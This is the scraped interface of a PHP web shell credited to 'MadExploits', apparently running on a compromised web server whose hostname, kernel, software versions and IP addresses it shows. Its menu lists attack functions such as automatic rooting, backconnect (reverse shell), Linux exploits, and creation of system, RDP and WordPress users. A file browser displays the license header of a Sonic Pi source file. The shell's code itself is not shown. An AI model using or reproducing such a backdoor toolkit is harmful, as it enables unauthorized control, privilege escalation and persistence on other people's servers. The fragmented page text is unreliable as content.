Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
sonic-pi /
server /
lib /
sonicpi /
osc /
[ HOME SHELL ]
Name
Size
Permission
Action
osc.rb
564
B
-rw-r--r--
oscdecode.rb
3.67
KB
-rw-r--r--
oscencode.rb
4.84
KB
-rw-r--r--
tcp_client.rb
1011
B
-rw-r--r--
tcp_server.rb
3.63
KB
-rw-r--r--
udp_client.rb
1.1
KB
-rw-r--r--
udp_server.rb
2.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : osc.rb
#-- # This file is part of Sonic Pi: http://sonic-pi.net # Full project source: https://github.com/samaaron/sonic-pi # License: https://github.com/samaaron/sonic-pi/blob/master/LICENSE.md # # Copyright 2013, 2014, 2015, 2016 by Sam Aaron (http://sam.aaron.name). # All rights reserved. # # Permission is granted for use, copying, modification, and # distribution of modified versions of this work as long as this # notice is included. #++ require_relative '../../../vendor/fast_osc-0.0.12/lib/fast_osc' require_relative 'udp_client' require_relative 'udp_server'
Close